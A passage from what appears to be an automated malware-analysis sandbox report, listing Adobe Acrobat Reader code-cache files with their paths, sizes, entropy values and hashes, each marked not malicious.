                                                                                                                          MD5:FE2AE6403707A3BCD1CBFB6FE756460D
                                                                                                                          SHA1:CCED335AF505F8723D0633B70EF2200C7973C842
                                                                                                                          SHA-256:41539A51896BDF36FE25701DAD550960A9759C911D2D1D0FE29EA4C68831FCDB
                                                                                                                          SHA-512:A979A8DFDCAABFD54B84FD2155AEB875EFEDA86C32C52DB1BA2675C5691E51599AEA81AB51E44E514C22C4434F7FF9627B114458C55115473B8B15DE174519B2
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..A..Eo...................................*"Js..............7...o..a=.98I......(3.$G.A..Eo........=.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):234
                                                                                                                          Entropy (8bit):5.268502377546291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mYXYOFLvEWdrROk/RJbu0H6tq/IfO44n:/RrROk/JaE/IfL
                                                                                                                          MD5:F5FD05545746FDFD81280376F0F85034
                                                                                                                          SHA1:669DD38F3F621795A019A7C341DC38802A7BF4DC
                                                                                                                          SHA-256:F3651DBF08FA9BABCEB9570C189618AB41D555FFB33CD4C0845F9531A37B0298
                                                                                                                          SHA-512:22ED8FD97C798FE349B620EFB660141D3C49243B3C638A331A6499FE27769C79E0805BE52C48A45A0498A8C4B968994C0E6A030599318FD9EE2A065312CDD862
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..A..Eo...................................*"J).........~..rw.+[....!.)?..f.U..(=.=.A..Eo.........z........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):190
                                                                                                                          Entropy (8bit):5.156947996968257
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVGH5kt1llhDmmzoIN1OFPL4mLZX:mmDEYOFLvEWXIGH6tWmzV1QPLrV
                                                                                                                          MD5:7ACADCF64E48A09DE0D41B49FBC03ACB
                                                                                                                          SHA1:7318E03F9EDD1D0FD1A37EE1D5C24058B607D291
                                                                                                                          SHA-256:6FE7566855A45608833C219EA64A4E2745013909695AB473B3BF9BE0CCD12797
                                                                                                                          SHA-512:FE645148E8C1ADCC6A6A33714A050D33438E71ECB9A95A047FAFE4CFD6B22055566F906C876F7A1DF751E02CA02FA8EDA9DF8C9121C3C3151B3A25780F0F8798
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..A..Eo...................................*"J..........~]...%s..<...n.f..<.....1#..U..A..Eo......|..Z........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):211
                                                                                                                          Entropy (8bit):5.248490273238571
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvGH5kt1llhhw8D6EsEJeUm8htl:m52YOFLvEWdMAu0H6tyEvsEJ48h
                                                                                                                          MD5:5A6F3AE2D6C0F8CDA8D5DD74608289AE
                                                                                                                          SHA1:A44C8B81ECAA127A4B2F95D79A71198BEDE173AF
                                                                                                                          SHA-256:913CD4497EFF25771D5A58803091B38C42CBB0F3B26B08ABE688ADB823DD9CF1
                                                                                                                          SHA-512:7B9C927634CB8472F4257EC35431EDA1DD9CD6B0803CAE565DAD257839C770DD9060D30B650620F4207A34A8937B78340E0B6FA77D4D4EB8D957F30D9F0A668A
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..A..Eo...................................*"J..........z._a...'.v.......4p3..1.']...A..Eo......d..%........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):214
                                                                                                                          Entropy (8bit):5.214947829362534
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFvGH5kt1llhLMTFoDb7T2/MS:mYilPYOFLvEWd8CAdAu0H6tPMRongH
                                                                                                                          MD5:E6F4EDD60A2848FC6C3AED4951B5C0AF
                                                                                                                          SHA1:E2A49CA23BB805181968FF865A8DD192053685B3
                                                                                                                          SHA-256:47A9EC0360AF14253E4B5C5BD03EEC7322911AF9919312CA2712E771B4FECEBF
                                                                                                                          SHA-512:7991DD55F73AA4A8480C20B18B6B83252BDC073FA48AE397DA920B669F0C1FE263CF9DBEB21BB3EBF7B84BF9477EA36FD7193E8A5CF32A9978A51ACC8C58DF52
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..A..Eo...................................*"J........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo.........g........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):227
                                                                                                                          Entropy (8bit):5.233093863398535
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l18t08RzYOCGLvHkWBGKuKjXKeRKVIJ/2oKPWFvGH5kt1llhEVlOe28WIJLkxS:mY8nYOFLvEWdrROk/Iu0H6tGN16wG47
                                                                                                                          MD5:2681ADEA1E397C5B1A8A8AA4E74B4406
                                                                                                                          SHA1:68E78E8C5C584D28E1669D00F61EA178B339F0ED
                                                                                                                          SHA-256:D6889184EDBF8571FD1A88805541F240930215A18810286DE290730493A1D10D
                                                                                                                          SHA-512:3A45526CEA72535653F9CDA2ADF3538D9FAC48AC3E29F4D6946FF70F4E7F951A5F9C76A91615A0C1758F367ED6B718330EB740F2D80433FDD7721D7AC6CCDBCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..A..Eo...................................*"J/.........%.k.SZ..~W.....:)'B..ad......A..Eo................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):217
                                                                                                                          Entropy (8bit):5.294218372007787
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lstxt08RzYOCGLvHkWBGKuKjXKX+IAuAJVKjXKLuVGH5kt1llhp/ll/YPmJelV:mLrnYOFLvEWdrIoJUQNH6tGeJIi
                                                                                                                          MD5:916E55579647F23D6140358D2C20632E
                                                                                                                          SHA1:926B41C7DC3F20166D906323EC9FE7283A7865C7
                                                                                                                          SHA-256:698E60C9628B7FF0C75DBB2CEF52FA8F52B7DC6539FA46BF64BB0E22AC257989
                                                                                                                          SHA-512:D3E7F2CAD683EBE2898CD34BB04CDD6AE2A430D2BCE344138090E1C48A4A7FE2D966D4EF840B1C2D83A0180C177BA08D3EDF22090F23A7B9E143440EC293FBDA
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..A..Eo...................................*"J.........;"./N_.,.:C..2....9L.H...3:...A..Eo.........p........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):212
                                                                                                                          Entropy (8bit):5.187311695083713
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lQ/pqv8RzYOCGLvHkWBGKuKjXKX+IALKPWFvGH5kt1llh+/l3/6mgmOZLhT7Ua:mOEYOFLvEWdrIhu0H6tuPzgm2d/h
                                                                                                                          MD5:03EC571AAC24F4594CB78E8D54AB5928
                                                                                                                          SHA1:DAB6C391C96444B72FFDC70520DBD06EC64C7F24
                                                                                                                          SHA-256:7CBC98C8E568DFEE475C61384901EE082419691171880B02955EC29504D88CB7
                                                                                                                          SHA-512:8EDEC54A6A35CA3645073BBCE13B6B7041D315719D4BC9A9A5BEBC438B1F3148B01CBF0CB86E62F70E4F9303BC2FDC7400E80B18E88E8C49C2F408D354DD698B
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ..A..Eo...................................*"J%.......Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo........t-........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):192
                                                                                                                          Entropy (8bit):5.210159265495963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvGH5kt1llhx/t2BiaQ562HvpMm5jl:mAElVYOFLvEW1KBH6t1/Bx56uvp5
                                                                                                                          MD5:CB95D506AB53EC1231E66378B454E3F2
                                                                                                                          SHA1:AEF5C8082BE4D4DF5C82B3C784DCCE9778134C12
                                                                                                                          SHA-256:8D4378D719A9DA99386DE98935927AE8A3B503D8A38A40DA4D2844B2269D0A38
                                                                                                                          SHA-512:5006799EEEC7D824509F1E1521D9CC35706C98C6FCE257E9F4638EEFA2317994C0B125D7EACDC96251534542A8FCD190E765F6D86F4C5E6EB11D4B32BB57572F
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ..A..Eo...................................*"J........z?...SwC...^..y.....V..7R-O.....A..Eo......0.`.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):218
                                                                                                                          Entropy (8bit):5.2884489610546614
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:mWYOFLvEWdBJvvu0H6ty2CUDLYtmOZnV:xRBJ9a9DcFZ
                                                                                                                          MD5:988BF80F35E4EE1A01A11C3C87E0BF05
                                                                                                                          SHA1:77F71896AF391A544D3AC6EEC99909416F1CA5F7
                                                                                                                          SHA-256:0077358B60E0A4F100B06756669C96D0D091A1AF34C601B890ECC29CC7EE73D4
                                                                                                                          SHA-512:FF4EDE0A205DE5AB08376286AB37E29B7B759BBE33017159583DDEE210ACCA60E72724C2BC5EFE345AD53965843A0D72CB96E1B3D8BAEB7614ACAD22885A1E9E
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..A..Eo...................................*"J............t.q..W.EZ....1...[.zC.7mD..A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):215
                                                                                                                          Entropy (8bit):5.242959200660021
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvGH5kt1llhetP/pSKGoSSl1:msRPYOFLvEWIa7zp7VH6titn8VPuL9
                                                                                                                          MD5:E81DC5BD06B3AB03496676871EEDFED8
                                                                                                                          SHA1:63A2DD9E583D03D509BF9C861A3C0673308ED740
                                                                                                                          SHA-256:A7C962D323BCA43D2CEE5C084029901537FD0874CC70D7323502340D2DC6225C
                                                                                                                          SHA-512:80BA2EABDCA8B9957903B4B7D664C2C6A92CEAAC006A9C4E8E35DC3CDE4877561EE6E91EE5032BB8E163F988972E88D1F41384011F2481FC8A812F80174E400E
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..A..Eo...................................*"Jc..........L...Im.@.........E.nW...IP..A..Eo.......,.U........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):213
                                                                                                                          Entropy (8bit):5.186303431525398
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maYt6EYOFLvEWd5Rf29QNH6t8qygmblfqu/XEX:sDRH4eaZy7sGEX
                                                                                                                          MD5:687304C89F0AA55EE8A0BDE838BF3859
                                                                                                                          SHA1:849A3359C4149486E0E8ECBAFB32EA98DDFCAF78
                                                                                                                          SHA-256:6D5AE0A024BDA351CEC4E84D31F4271F4CF5C0419BC2ED7B9D73B7C61B0E7BBC
                                                                                                                          SHA-512:894861874EFEDB3ACD4C41F7E4EE639F2E9A87A032D41184E375D9EF8C884AECC7C86DB3BDB68A4BCC28510F86F3F177A52B62BF4043C088E68A4B62F8EF411C
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Q....)il...._keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/plugin.js ..A..Eo...................................*"J............xc.6.#....K..1\p..%.!.....i.A..Eo........VA........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\c03c0918f3ea6b81_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):192
                                                                                                                          Entropy (8bit):5.154129934950013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l8sldA8RzYOjGLvHkwIEZArCvGH5kt1llhvfJNEB2bVqgKSk4K5mjz/l:mQ9YO6LvEwhIH6t0MhKX4j
                                                                                                                          MD5:D385D29D324DE5EF1423B61631739276
                                                                                                                          SHA1:08F99C18DD827E52055EEEAAF733B742AFA477FA
                                                                                                                          SHA-256:44AF7B43309E2AE8C14286FDD63B541BEBD3EB4CD97EA01E5E3C3428044D7481
                                                                                                                          SHA-512:7A9506A5DE34E86185E1FB90A71068CF2B03544F67B3BD3E9674E977BE3DEE7D2E902C43163E2E096B413A25CA70245583D444939F44FDCDAF4A2EC4CE5A2353
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......<....}......_keyhttps://rna-v2-resource.acrobat.com/dc-app-launcher.js ..A..Eo...................................*"J........P.6,."Q..\...Nr.>.:x.30.../F.JG.A..Eo......s.,.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):212
                                                                                                                          Entropy (8bit):5.266427416147326
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lQWt6v8RzYOCGLvHkWBGKuKjXKjcAW6KLuVGH5kt1llhSlvh4MY3jBMQ7GRzXU:mQt6EYOFLvEWdccAHQNH6tC4jBRCh/4
                                                                                                                          MD5:879D51DAE36479965D5AE2E9027882F8
                                                                                                                          SHA1:3A96713386073FE0CDE0BBF35B60FCC59765DF82
                                                                                                                          SHA-256:122318E4E6F68ADBDFC41EA5A85FCCFE4EEFB761C27F222E460D5FD6993D7B9E
                                                                                                                          SHA-512:78F0CBA3440BCD18A47A01F518C323B13FDBBC1D54103B24D6828F26D25B524EAA9455B73C64BCD93C8D4D32DB48E040F61EA6E8C0AD2425B7CF43E55DD19536
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ..A..Eo...................................*"J6.......PJm...0x.x..RD...BB!@5..<..]....A..Eo........7y........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):215
                                                                                                                          Entropy (8bit):5.235854013549541
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:msrnYOFLvEWd5Rf2Au0H6t8zspKGeNJS2:BlRHFav52
                                                                                                                          MD5:A7659DFA9F7368A750EF8E2DAC07E9A5
                                                                                                                          SHA1:6C0194B9795FF883FDEA79DED8AC03CA7EC09350
                                                                                                                          SHA-256:59A06CBEF92478EA650AD196934DA78287F83B7BDD4DA623E5E0C525AE587B26
                                                                                                                          SHA-512:9418CCA0BD8E90FC6B6F5E525D279AAE40F651CD620C3070474E08CD0ECC3158CB7D653B1CFC24A12E9EB65B04FA5BC5AD55180BBF6AC21DF875D76A3DCB4C3E
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......S....c......_keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/selector.js ..A..Eo...................................*"J}................v.:......NH..-.A.C.Et..A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d718cdd8437bf89e_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.342343923237966
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:masIYO6LvEwQlRmVd5u0H6tXFZJeTXIGb/5xtl:oaOQK75u0aDeTXIGbjtl
                                                                                                                          MD5:C153904AF748C93D19427CADDB545FB1
                                                                                                                          SHA1:DE5643D469AC076B9B9A7D0FD1E9A4B296D71C22
                                                                                                                          SHA-256:F727CB2DFF8A04EF3AC9399A3F4553C67F75E119893F1D8B86F05A57432B8AFA
                                                                                                                          SHA-512:2344EBABD8EA887089F1844C57A33B510716032EE30BD443EDF08C10643857BC9381007B09025020E38E284BA42BD432B33755F20004542F3B43CA377B30A02A
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/3815-chunk.js ..A..Eo...................................*"J........M.a...x...U..4Oo.%k..;.C..m.F.FB.A..Eo.......Y.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d742071e43604bc4_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):221
                                                                                                                          Entropy (8bit):5.358487798778556
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maWEYO6LvEwQlRmVGbu0H6tnb6dOYXNll:NOQKCu0a633
                                                                                                                          MD5:BDD8AB8FC4DA5A70D2504F3D59BA1A7D
                                                                                                                          SHA1:8251C58A343E85FDBE023807149718EA01E243C2
                                                                                                                          SHA-256:4B11F10682DBFEBD7926109456355551ACCB1A949EDCBB4689E406FDD0A0EA24
                                                                                                                          SHA-512:2D7D31541427C37AE89BB8794C07807A02544970E92677AF75C8034FE4A0739A767802EFCDF1D7B7D216A665D668426E7BECA2A097D10E0C1D2C7805A7BA490A
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......Y....`......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8950-chunk.js ..A..Eo...................................*"J ............0I. >....I...$\U;........A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\e58e492b0f04240a_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):214
                                                                                                                          Entropy (8bit):5.304845200122047
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:maJYOFLvEWdfNBHvdQNH6tAPzPne7cV6gr:v/RfTHleaQPneYU
                                                                                                                          MD5:23009744512B1603D7033B15ECF4FE0A
                                                                                                                          SHA1:557407C1D585786768553E7EA76FAFD201FE4260
                                                                                                                          SHA-256:44895E0334EE4487ACC47EB788A2D7EC7D03B98355058127BB861A0099917F6D
                                                                                                                          SHA-512:F6352BEE6D262F100BCC7A6806DEFE773BA8F137AB1418E3D4098FCE09B5507AFB5562CFC0FC80BF34A60C93BDB0DE0BCC58AB6A2C4D06AC547D580F94237726
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......R..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/plugin.js ..A..Eo...................................*"J........E*).*^.!..C......G..#.&)A..Y..A..Eo......:H$.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):212
                                                                                                                          Entropy (8bit):5.187310916408366
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lQyu6OA8RzYOCGLvHkWBGKuKjXK9QXAdWKjKLuVGH5kt1llhql0QW4ThzJuA4r:mkqYOFLvEWd8CAd9QNH6ta0uuA424rl
                                                                                                                          MD5:DF413FD3C058A6584C6FC090A60A17BC
                                                                                                                          SHA1:0CEEB8BBAFF2CAC317828455553025675A0638BF
                                                                                                                          SHA-256:6F3087F19239DCE5FB5A9FBFB1CE31C790A4CC317983C03347D63A1FEE447AE4
                                                                                                                          SHA-512:CDB98D1AE19654CEA8BC98AE732D1C0128D3D9587F2A3E0FBE004AE55410CABE80ABE6C5D511CD5082D0C4000EEF252D846E47EED2023112383AB83AB56A9A73
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ..A..Eo...................................*"J>.......#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):225
                                                                                                                          Entropy (8bit):5.26826994156133
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lFNrs8RzYOCGLvHkWBGKuKjXKeRKVIJ/2kKLuVGH5kt1llhTVlsYWmYk5miUl/:mQZYOFLvEWdrROk/VQNH6tfsLmB47
                                                                                                                          MD5:5214AD42593B4C5AE7B53604C45FBA31
                                                                                                                          SHA1:085D353CE3756E445B3A88C9E602442DE5573168
                                                                                                                          SHA-256:C2AFF2F99E3824C8034BF9C129970552AA36B81507A65AF3E47CF6860E55A264
                                                                                                                          SHA-512:1F2FFB18040B10476E82EDF34A6F486CE4D3394E35EB3DF2E0C0FD691CAD2F5940945AA357DC19E8F3F23CF0151F0E5A9BFB98DB37E5B31940C4DF22BC0FB77C
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..A..Eo...................................*"J6....... ./.ev......N~..6.b.....$.j;:C...A..Eo........@.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):214
                                                                                                                          Entropy (8bit):5.206926422353901
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lUV/la8RzYOCGLvHkWBGKuKjXKjcAW6KPWFvGH5kt1llhAXjFrobk9mZa6tokd:mZ/lXYOFLvEWdccAWu0H6tcXRdm9746
                                                                                                                          MD5:5F7D40280D2368C0A5D8601D4A2E945D
                                                                                                                          SHA1:81C20913FE4128117A85F0BE21BC4D1BA26201EF
                                                                                                                          SHA-256:7026EBCBBC139E3AB3F0A7A1CC2C7F0055C1C1B215B91C693D853E131483087D
                                                                                                                          SHA-512:F058C52A5391B4B54AACC2E2BBE2B6272B6C58EDAE40C5388F998DD2B6F1FA815ADD59D3FB64A04CEC12FD886CC64C977362230D8E7CBF7E18F0D6CDDB2AC251
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ..A..Eo...................................*"J...........U...I.>P...X...x..0U.~;m.x.k.A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):208
                                                                                                                          Entropy (8bit):5.188726888099098
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvGH5kt1llhJzJ/JSB6shoq+Nem3dn:mMOYOFLvEWdwAPVu0H6tUB6Jn3dR
                                                                                                                          MD5:CE63E23765B504FC63CEF94657605D6D
                                                                                                                          SHA1:84FD4C7365142BF8D21C813FD8CF0C81B8C7460C
                                                                                                                          SHA-256:5CE422F55B6E4491ABF195EAA69AD6D20B2C3C0EA48C706B055F2DEEA39D51FF
                                                                                                                          SHA-512:584D37E3255DC57C07E20D21F329FAF5E9033CF2E6D4D8064699069EB2EDAB4F02EB799E29CC09F2F8C71D84FD6B429D0A0B373A777EAEC1A5D1A98FCF07911D
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..A..Eo...................................*"Jt............k....F..D..O.n;[.1m.....=..A..Eo..................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):232
                                                                                                                          Entropy (8bit):5.260679833520451
